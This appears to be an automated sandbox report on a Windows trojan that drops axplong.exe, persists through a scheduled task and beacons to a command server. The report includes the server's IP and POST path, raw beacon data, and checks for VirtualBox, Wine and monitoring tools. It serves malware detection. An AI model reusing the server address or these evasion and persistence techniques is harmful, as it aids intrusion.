                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006DBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,8_2_006DBD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.1
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.

                    System Summary

                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: .idata
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_007130688_2_00713068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006DE4408_2_006DE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006D4CF08_2_006D4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00707D838_2_00707D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0071765B8_2_0071765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006D4AF08_2_006D4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0071777B8_2_0071777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_007187208_2_00718720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00716F098_2_00716F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00712BD08_2_00712BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9975359758174387
                    Source: file.exeStatic PE information: Section: amswznhi ZLIB complexity 0.9942809871941896
                    Source: axplong.exe.1.drStatic PE information: Section: ZLIB complexity 0.9975359758174387
                    Source: axplong.exe.1.drStatic PE information: Section: amswznhi ZLIB complexity 0.9942809871941896
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 50%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                    Source: file.exe Static file information: File size 1877504 > 1048576
                    Source: file.exe Static PE information: Raw size of amswznhi is bigger than: 0x100000 < 0x198c00

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 8.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.1.dr Static PE information: real checksum: 0x1d4762 should be: 0x1d96e0
                    Source: file.exe Static PE information: real checksum: 0x1d4762 should be: 0x1d96e0
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: .idata
                    Source: file.exe Static PE information: section name:
                    Source: file.exe Static PE information: section name: amswznhi
                    Source: file.exe Static PE information: section name: zlhbfepu
                    Source: file.exe Static PE information: section name: .taggant
                    Source: axplong.exe.1.dr Static PE information: section name:
                    Source: axplong.exe.1.dr Static PE information: section name: .idata
                    Source: axplong.exe.1.dr Static PE information: section name:
                    Source: axplong.exe.1.dr Static PE information: section name: amswznhi
                    Source: axplong.exe.1.dr Static PE information: section name: zlhbfepu
                    Source: axplong.exe.1.dr Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_006ED84C push ecx; ret 8_2_006ED85F
                    Source: file.exe Static PE information: section name: entropy: 7.98822985623302
                    Source: file.exe Static PE information: section name: amswznhi entropy: 7.951896268933144
                    Source: axplong.exe.1.dr Static PE information: section name: entropy: 7.98822985623302
                    Source: axplong.exe.1.dr Static PE information: section name: amswznhi entropy: 7.951896268933144
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
